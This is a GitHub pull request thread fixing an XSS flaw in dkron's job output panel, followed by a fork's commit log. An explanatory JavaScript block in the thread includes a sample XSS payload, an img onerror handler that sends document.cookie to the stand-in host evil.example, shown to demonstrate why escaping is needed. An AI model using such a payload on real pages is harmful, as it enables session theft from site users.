
Fix XSS vulnerability #922

Merged
merged 3 commits into from Mar 14, 2021

Conversation

@yvanoers yvanoers (Collaborator)

Fixes #921.

The original code seemed to deliberately use unescaped HTML. I'm hoping that was accidental and this doesn't break anything.

@vcastellm vcastellm (Member) left a comment

I remember that I went for the unsafe option, but I don't know why. Have you checked that the output reads correctly and is well formatted?

@yvanoers yvanoers (Collaborator, Author)

I checked that the output gets encoded properly. Judge for yourself:
Before: [screenshot of the output panel before the fix]
After: [screenshot of the output panel after the fix]
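The thread above contrasts two ways of putting job output into the page: treating it as markup (the "unsafe option" the maintainer refers to, i.e. what `innerHTML` or React's `dangerouslySetInnerHTML` does) and treating it as text, HTML-encoded at render time. The following is an added illustration of that difference; it is not dkron's code and not the diff from this pull request, which the page does not show. The function names (`escapeHtml`, `renderOutputUnsafe`, `renderOutputSafe`, `hasInjectedTag`), the `job-output` class and the sample output string are all constructed for the example.

```javascript
// Added example (not dkron's code): why rendering job output as raw HTML is an
// XSS sink, and how HTML-encoding it at render time fixes that while keeping the
// output readable and its line structure intact.

// The five characters that can change meaning in an HTML text or attribute context.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const UNESCAPES = Object.fromEntries(Object.entries(ESCAPES).map(([ch, ent]) => [ent, ch]));

// Encode text for insertion into HTML. One pass with a callback, so '&' is never
// double-encoded and newlines are left alone (a <pre> will preserve them).
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Reverse of escapeHtml, used below to show that nothing is lost by encoding:
// what the browser displays is exactly the bytes the job wrote.
function unescapeHtml(html) {
  return html.replace(/&(?:amp|lt|gt|quot|#39);/g, (ent) => UNESCAPES[ent]);
}

// Vulnerable pattern: the output string is trusted as markup. Anything the job
// (or whatever the job ran, or the data it processed) printed becomes live HTML.
function renderOutputUnsafe(output) {
  return `<pre class="job-output">${output}</pre>`;
}

// Fixed pattern: the output string is text. Tags in it are shown literally.
function renderOutputSafe(output) {
  return `<pre class="job-output">${escapeHtml(output)}</pre>`;
}

// Constructed sample of what a job's stdout could contain if an attacker can
// influence anything the command prints. The onerror handler would run in the
// origin of the dkron UI for whoever opens the execution's output panel.
const SAMPLE_OUTPUT =
  'backup finished: 3 files\n' +
  '<img src=x onerror="fetch(\'//evil.example/\' + document.cookie)">\n' +
  'exit status 0\n';

// Check used only to make the difference visible: does the rendered markup
// contain any tag other than the <pre> wrapper the renderer itself emitted?
function hasInjectedTag(html) {
  const inner = html.replace(/^<pre class="job-output">/, '').replace(/<\/pre>$/, '');
  return /<[a-zA-Z!\/]/.test(inner);
}

// Does the rendered markup still carry the job's line structure?
function keepsLineBreaks(html, output) {
  return html.split('\n').length === output.split('\n').length;
}

console.log('unsafe render injects a tag:', hasInjectedTag(renderOutputUnsafe(SAMPLE_OUTPUT)));
console.log('safe render injects a tag:  ', hasInjectedTag(renderOutputSafe(SAMPLE_OUTPUT)));
console.log(renderOutputSafe(SAMPLE_OUTPUT));
```

The encoding is specific to the HTML body context: the same string dropped into a URL, a script block or an event-handler attribute needs a different encoder, which is one reason to prefer the framework's default text rendering (JSX interpolation, `textContent`) over building markup by hand. Escaping at render time, rather than stripping or sanitising at storage time, is what lets the "after" screenshot still show the job's output exactly as it was written.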

@vcastellm vcastellm (Member) left a comment

LGTM thanks!

@vcastellm vcastellm merged commit b6b593a into distribworks:master Mar 14, 2021
@sc0rp10 sc0rp10 (Contributor) commented Mar 14, 2021

@Victorcoder could you please also tag a release with that fix?

@yvanoers yvanoers deleted the fix-xss-vuln branch March 14, 2021 22:43
MGSousa pushed a commit to MGSousa/dkron that referenced this pull request Mar 15, 2021
commit a127a76
Merge: ffaf975 347cf72
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 15:39:45 2021 +0000

    Merge branch 'master' of https://github.com/MGSousa/dkron

commit ffaf975
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 13:07:06 2021 +0000

    Remove custom status for untriggered/pristine jobs && Minor changes

commit 8c9440b
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 11:44:07 2021 +0000

    Added public directory

commit aa96dcf
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Wed Mar 10 12:52:52 2021 +0000

    Added Pristine Jobs to React UI

commit eb18129
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 11:53:02 2021 +0000

    FIX change header name DKRON_PRISTINE_JOBS

commit d1c3184
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 10:22:15 2021 +0000

    Provide filter query by job displayName, add disabled pristine jobs reports

commit 347cf72
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 13:07:06 2021 +0000

    Remove custom status for untriggered/pristine jobs && Minor changes

commit 92fd8f5
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 11:44:07 2021 +0000

    Added public directory

commit b6b593a
Author: Yuri van Oers <yvanoers@gmail.com>
Date:   Sun Mar 14 23:40:46 2021 +0100

    Fix XSS vulnerability (distribworks#922)

    * Tidy modules

    * Fix "can't import package" error

    * Fix XSS vulnerability

commit 2b2a2b2
Author: Etienne Duclos <duclosetienne@gmail.com>
Date:   Sun Mar 14 13:41:24 2021 -0400

    feat(ui): add a filter on disabled state (distribworks#923)

commit 31c6324
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Wed Mar 10 12:52:52 2021 +0000

    Added Pristine Jobs to React UI

commit 92a9709
Author: Victor Castell <victor@victorcastell.com>
Date:   Tue Mar 9 09:37:53 2021 +0100

    Update go.sum

commit 296a9fa
Author: Victor Castell <victor@victorcastell.com>
Date:   Mon Mar 8 22:44:39 2021 +0100

    Update changelog

commit 1a982e0
Author: Victor Castell <victor@victorcastell.com>
Date:   Mon Mar 8 22:30:55 2021 +0100

    Add the ui/public dir (distribworks#919)

    It was missing because of wrong gitignore

commit 20ab436
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 11:53:02 2021 +0000

    FIX change header name DKRON_PRISTINE_JOBS

commit 5be4196
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 10:22:15 2021 +0000

    Provide filter query by job displayName, add disabled pristine jobs reports
Linked issue that this pull request may close: XSS injection in output panel
3 participants